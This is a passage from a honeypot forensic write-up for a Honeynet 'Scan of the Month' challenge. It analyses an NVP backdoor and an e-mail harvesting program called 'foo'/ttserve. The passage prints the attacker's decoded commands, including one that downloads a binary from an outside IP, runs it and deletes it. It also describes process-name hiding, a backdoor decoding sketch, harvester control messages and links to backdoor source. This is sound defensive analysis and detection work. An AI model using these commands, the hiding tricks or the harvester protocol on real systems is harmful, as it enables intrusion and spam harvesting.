"./ttserve" just executes the program "foo", which was downloaded from http://216.242.103.2:8882/foo and saved as /tmp/ttserve (see section 2.3). Running "ttserve" starts the e-mail harvesting process I explained in Question 4.

As we saw in the previous question, one of the first things that ttserve (a.k.a. "foo") does when it runs is to fork. The parent process exits but the child stays running, doing its evil business. This means that control returns to the shell and the command "rm -rf /tmp/ttserve" is executed while "ttserve" is still running. /tmp/ttserve is removed by the attacker to get rid of the evidence. Now that the program is running, there is no need to have the executable lying around anymore.

Remember also that "ttserve" concealed its program name as "(nfsiod)" so it could not be noticed by a valid user of the honeypot through the "ps" command. This is an extra measure to prevent detection of the activities performed by the attacker.

Finally, since './ttserve ; rm -rf /tmp/ttserve' is not executed through an interactive shell, there is no .history or .bash_history file that can be used to determine what commands the attacker executed.

Question 6. How do you think the attacker will use the results of his activity involving 'foo'?

As we saw, foo is a tool that harvests electronic mail addresses from web.icq.com. In these days when e-mail spamming has become one of the worst plagues of the 21st century (an e-plague), it is fairly obvious what the attacker can do with thousands of e-mail addresses collected automatically by a little program in very little time. Ways in which the attacker could use the results of his activity involving "foo" include:

The attacker might be a spammer, so he/she would use all these e-mail addresses collected by "foo" to send unsolicited mail to innocent people.
Or he might just sell all these addresses. Coincidentally, I just received a spam e-mail from a bozo that was offering for sale thousands of e-mail addresses.
Or the attacker could use the e-mail addresses to create havoc, like DoS'ing an ISP's SMTP server, or mail-bombing these innocent souls.

I find the first of these the most likely use of the e-mail addresses.

Bonus Question. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?

I just administer a home network, and my border router is configured to block most traffic except some traffic that I explicitly allow for services I use. For example, I allow HTTP traffic to go through.

The border router is also configured to log all blocked traffic to an internal syslog server, so I would probably have noticed the NVP traffic by looking at the syslog:

```
Aug 12 19:33:57 gw 7455: Aug 12 23:33:57: %SEC-6-IPACCESSLOGNP: list 111 denied 11 ww.xxx.yy.zzz -> aa.bb.ccc.ddd, 1 packet
```

(the 11 after "denied" means "IP protocol 11")

The above syslog entry was generated when the border router blocked an incoming IP packet that had the IP protocol field set to 11 (NVP).

Obviously, I would only have noticed that an NVP packet was blocked; I would not have obtained the packet itself unless I was also capturing network traffic.

An Intrusion Detection System (IDS) like Snort would be the best way to detect the NVP backdoor because we could add signatures that would trigger an alert on the presence of IP protocol 11 traffic, and we could also have the IDS save the suspicious traffic to a disk file for later analysis. The Reverse Challenge (see question 4) asked a similar question to this one.

What would have been hard to notice is the sweep of web pages from web.icq.com that "foo" performs to harvest e-mail addresses. It is hard because the requests look like legitimate web traffic, are not logged anywhere, are small, and happen at a very slow rate (every 25 seconds.)
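A slow sweep gives itself away through regularity rather than volume. One possible heuristic, sketched below in C and not a feature of Snort or any other existing IDS, is to flag a client whose requests to one web server arrive at a near-constant interval. It assumes the request timestamps have already been grouped per client/server pair (for example from proxy or flow logs); looks_periodic() and its parameters are hypothetical, and legitimate polling clients would trigger it too.

```c
#include <stddef.h>

/* HYPOTHETICAL heuristic. ts[] holds the times (seconds, sorted ascending)
 * of requests from one client to one web server. Returns 1 when there are
 * at least min_gaps intervals and every interval lies within tol seconds
 * of the mean interval, i.e. the client looks like a fixed-rate poller. */
int looks_periodic(const double *ts, size_t n, size_t min_gaps, double tol)
{
    double mean, dev;
    size_t i;

    if (n < 2 || n - 1 < min_gaps)
        return 0;                          /* too few samples to judge */
    mean = (ts[n - 1] - ts[0]) / (double)(n - 1);
    for (i = 1; i < n; i++) {
        dev = (ts[i] - ts[i - 1]) - mean;
        if (dev < 0)
            dev = -dev;
        if (dev > tol)
            return 0;                      /* irregular gap: not a fixed-rate poller */
    }
    return 1;
}
```

With a 25-second period and a tolerance of a second or two, a few dozen consecutive requests are enough to stand out from human browsing, whose gaps vary widely.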

Summarizing:

NVP backdoor traffic is easy to detect and prevent: block IP protocol 11 at border routers, and log all denied traffic.
Slow-rate HTTP sweeps are hard to detect.

4. Files

This section contains links to all the files referenced in this paper as well as a short summary of the purpose of the file.

Scan 22 Files

dump.c: Program used to generate the network dump that can be seen in Appendix A.
foo: It's a 200K file so I am not including it here. To reconstruct this file you'll need the Snort log for this Scan of the Month and to follow the instructions in section 2.3.
foo.c: decompiled "foo". This file makes it possible to understand "foo"'s mission in life. It was generated through a reverse-engineering process.
dump5.txt: assembly language source code for "foo". This is what I used to generate foo.c. This file was generated using the tools that Dion Mendel developed for the Reverse Challenge.

Files Used in Testing

wwp: CGI script to put in your web server's cgi-bin directory. The script receives a numeric parameter called "Uin" via the HTTP GET request and generates a pseudo-homepage that contains a "mailto:" URI that "foo" parses to harvest e-mail addresses.

Reverse Challenge Files

packet-format.txt: Format of packets for communications between backdoor and handler. I obtained this during my reverse-engineering of the-binary in the Reverse Challenge.
the-binary.c: This generates the-binary (the backdoor). It is provided here because it is useful for understanding how the backdoor and the handler communicate with each other, and because it is needed to answer Question 3.
control.c: allows you to control the backdoor. Provided for completeness.

5. Thanks

Reverse-engineering foo, a.k.a. ttserve, took me much less time than reverse-engineering the-binary in the Reverse Challenge, thanks to the tools that Dion Mendel <quietude at iinet dot net dot au> developed during the Challenge. Reconstructing the symbol table of foo was a no-brainer thanks to these tools (I feel ashamed of the approach I took back then; please don't ask.)
The Honeynet Project for these cool challenges.

Appendix A - NVP Backdoor Commands

In this appendix I include the output of dump.c after passing it the Snort log provided for this Scan of the Month. The log is a network trace that has 5085 packets. Here I am only including the packets that are related to communications between the backdoor running on the compromised honeypot and the handler.

Please note that the Snort log contains more NVP (IP protocol 11) traffic than what I am showing here (specifically, 16 packets are not shown below.) I left these 16 packets out because they are not relevant: remember that in packet 7 the NVP backdoor was initialized to send responses to 1 particular IP address plus 9 random addresses (of which only 8 are used due to a bug.) I am not including the responses sent to the random addresses; they account for the missing 16 packets (the two responses in packets 12 and 22, each also sent to 8 random addresses.)

peloy@canaima:/tmp$ dump -f snort-0718@1401.log
[...]
--------------------------------------------------
Packet 7, 11:09:13.557615

Length of IP data: 402 bytes
94.0.146.98 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 2 (Initialize communication parameters)
Response mode: 1 (To 1 specific IP address and 9 random IP addresses)
Respond to: 203.173.144.50 
--------------------------------------------------
Packet 8, 11:10:34.876658 

Length of IP data: 402 bytes
192.146.201.172 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 3 (Execute command, send back results)
Command to execute: grep -i "zone" /etc/named.conf
--------------------------------------------------
Packet 12, 11:10:35.005093

Length of IP data: 512 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 512
IP protocol is NVP
Direction: From backdoor
Command output:
'zone "." {
zone "0.0.127.in-addr.arpa" {
'
--------------------------------------------------
Packet 22, 11:10:35.495194 

Length of IP data: 463 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 463
IP protocol is NVP
Direction: From backdoor
Command output:
''
--------------------------------------------------
Packet 62, 15:35:00.285126 

Length of IP data: 402 bytes
168.148.27.14 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 63, 15:35:56.667243 

Length of IP data: 402 bytes
10.39.81.89 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 72, 15:57:37.983480 

Length of IP data: 402 bytes
58.248.76.90 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve ; 
   lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; 
   chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ;
   rm -rf /tmp/ttserve ./ttserve ;
--------------------------------------------------
Packet 1236, 16:02:40.043361 

Length of IP data: 402 bytes
218.209.145.27 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1237, 16:03:37.492985 

Length of IP data: 402 bytes
122.255.17.55 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1282, 16:04:33.707291 

Length of IP data: 402 bytes
26.44.146.84 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
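dump.c itself is only linked from the Files section. For readers who want to write a similar decoder, the following C sketch shows two pieces such a tool needs: undoing the backdoor's payload obfuscation and mapping command numbers to the names printed above. The encoding used here (each byte stored as the plain byte plus the previous encoded byte plus 0x17) is an assumption taken from public write-ups of the Reverse Challenge, not from this paper; packet-format.txt is the authority on where the encoded data starts inside the IP payload. All names are hypothetical.

```c
#include <stddef.h>

/* ASSUMPTION: enc[i] = plain[i] + enc[i-1] + 0x17 (mod 256), enc[-1] = 0.
 * Check packet-format.txt for the authoritative layout and offsets. */
#define NVP_KEY 0x17

/* Undo the chain. enc[i] is read before plain[i] is written, so the
 * two buffers may be the same (in-place decoding). */
void nvp_decode(const unsigned char *enc, unsigned char *plain, size_t len)
{
    unsigned char prev = 0, cur;
    size_t i;

    for (i = 0; i < len; i++) {
        cur = enc[i];
        plain[i] = (unsigned char)(cur - prev - NVP_KEY);
        prev = cur;                       /* chain on the encoded byte */
    }
}

/* Forward direction, handy for building test packets. */
void nvp_encode(const unsigned char *plain, unsigned char *enc, size_t len)
{
    unsigned char prev = 0;
    size_t i;

    for (i = 0; i < len; i++) {
        enc[i] = (unsigned char)(plain[i] + prev + NVP_KEY);
        prev = enc[i];
    }
}

/* Command numbers observed in the dump above. */
const char *nvp_command_name(int cmd)
{
    switch (cmd) {
    case 2: return "Initialize communication parameters";
    case 3: return "Execute command, send back results";
    case 7: return "Execute remote command, don't send back results";
    default: return "Unknown (not seen in this trace)";
    }
}
```

Since every encoded byte depends on the one before it, decoding must start at the first encoded byte; starting mid-buffer garbles the first decoded character.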

Appendix B - Testing

Now that I have studied foo.c, there is little doubt about the evil purpose of "foo". However, it always pays to do a little testing, so I made a couple of minor changes to foo.c and set up a test environment.

First, I wrote a small Perl script that simulates the /wwp script found at web.icq.com. The script receives a parameter called Uin via an HTTP GET request. When run, it generates a short HTML document that simulates a user's home page and includes a "mailto:" URI.
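A "mailto:" link is all the mock page needs, because pulling the address out of that link is the harvester's whole job. The C sketch below illustrates such an extraction, assuming the address ends at the first quote, '>', '?' or whitespace; extract_mailto() is a hypothetical helper, not code taken from foo.c.

```c
#include <stddef.h>
#include <string.h>

/* HYPOTHETICAL helper: copy the address following the first "mailto:"
 * in html into out (NUL-terminated). Returns the address length, or 0
 * if no address was found or out is too small. */
size_t extract_mailto(const char *html, char *out, size_t outlen)
{
    const char *p = strstr(html, "mailto:");
    size_t n = 0;

    if (p == NULL || outlen == 0)
        return 0;
    p += strlen("mailto:");
    /* the address ends at a quote, '>', '?' (query part) or whitespace */
    while (p[n] != '\0' && strchr("\"'>? \t\r\n", p[n]) == NULL)
        n++;
    if (n == 0 || n >= outlen)
        return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return n;
}
```

Fed a page containing <a href="mailto:1073@whatever.com">, it returns 17 and leaves "1073@whatever.com" in out, the same kind of address that shows up in the test session below.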

Next I edited foo.c and changed all references to "web.icq.com/wwp" to "localhost/cgi-bin/wwp" so when "foo" starts sweeping web pages it does so in my local Apache server, and not the remote web.icq.com. I also replaced all references to 216.242.103.2 with localhost, so when "foo" tries to contact the handler to get instructions it contacts my local machine.

Finally, I ran "foo" and netcat on the local machine. I started netcat listening on local UDP port 53413, the port "foo" is programmed to contact, and was then able to control foo by typing commands manually.

The following is a sample testing session:

peloy@canaima:/tmp$ vi foo.c                # s/web.icq.com/localhost/, etc.
peloy@canaima:/tmp$ gcc -Wall -o foo foo.c  # compile my foo.c
peloy@canaima:/tmp$ ps aux | grep nfs       # see if foo is running
peloy@canaima:/tmp$ ./foo                   # run foo
peloy@canaima:/tmp$ ps aux | grep nfs       # see if it is running now
peloy     7362  0.0  0.0  1316  500 ?        S    19:45   0:00 (nfsiod)
peloy@canaima:/tmp$ nc -l -u -p 53413 -vv   # netcat: listen on UDP port 53413
listening on [any] 53413 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 33508
GU                   <- foo sends the "Get Uin" command
GU                   <- I didn't respond so foo resends
DU1073               -> I respond
SE1073               <- A few seconds later foo sends the e-mails it's
1073@whatever.com       * harvested
1074@whatever.com       *
1075@whatever.com       *
1076@whatever.com       *
1077@whatever.com       *
1078@whatever.com       *
1079@whatever.com       *
1080@whatever.com       *
1081@whatever.com       *
1082@whatever.com       *
1083@whatever.com       *
1084@whatever.com       *
GOT                  -> I respond saying "I got the addresses"
GU                   <- foo asks for the next Uin
DIE                  -> I tell him it is time to die
 sent 15, rcvd 233
peloy@canaima:/tmp$ ps aux | grep nfs  # confirm that foo died
peloy@canaima:/tmp$ # it did :)
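Answering foo by hand in netcat is fine for one round, but the replies could also be scripted. The C sketch below encodes only what the session above shows ("GU" answered with "DU<Uin>", an "SE" batch acknowledged with "GOT", and "DIE" to stop) and is an assumption in every other respect: handler_reply() and its parameters are hypothetical, the session does not reveal how far foo advances the Uin between batches, and the UDP plumbing (bind() to port 53413, recvfrom(), then sendto() back to foo's source address) is left out.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* HYPOTHETICAL handler logic, modelled only on the session above.
 * msg:          datagram received from foo (NUL-terminated)
 * uin:          Uin to hand out when foo sends "GU"
 * batches_left: how many more "GU" requests get a Uin before "DIE"
 * Returns the length of the reply written to reply, or 0 for no reply. */
int handler_reply(const char *msg, unsigned uin, unsigned *batches_left,
                  char *reply, size_t replylen)
{
    int n = 0;

    if (strncmp(msg, "GU", 2) == 0 && *batches_left > 0) {
        n = snprintf(reply, replylen, "DU%u", uin);   /* hand out a Uin */
        if (n > 0 && (size_t)n < replylen)
            (*batches_left)--;
    } else if (strncmp(msg, "GU", 2) == 0) {
        n = snprintf(reply, replylen, "DIE");         /* tell foo to exit */
    } else if (strncmp(msg, "SE", 2) == 0) {
        n = snprintf(reply, replylen, "GOT");         /* ack the addresses */
    }
    if (n <= 0 || (size_t)n >= replylen)
        return 0;                 /* unknown message or reply truncated */
    return n;
}
```

Starting with batches_left set to 1 and uin set to 1073 reproduces the exchange above: DU1073, then GOT, then DIE.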

Footnotes

[1] I reverse-engineered the-binary from the Reverse Challenge. However, I could not finish in time so I didn't make a submission. My work with the-binary definitely helped me to understand some of the most important points of this Scan of the Month.

[2] The dump.c program, which decodes NVP backdoor traffic, was written specifically for Scan of the Month 22, not during my work on the Reverse Challenge.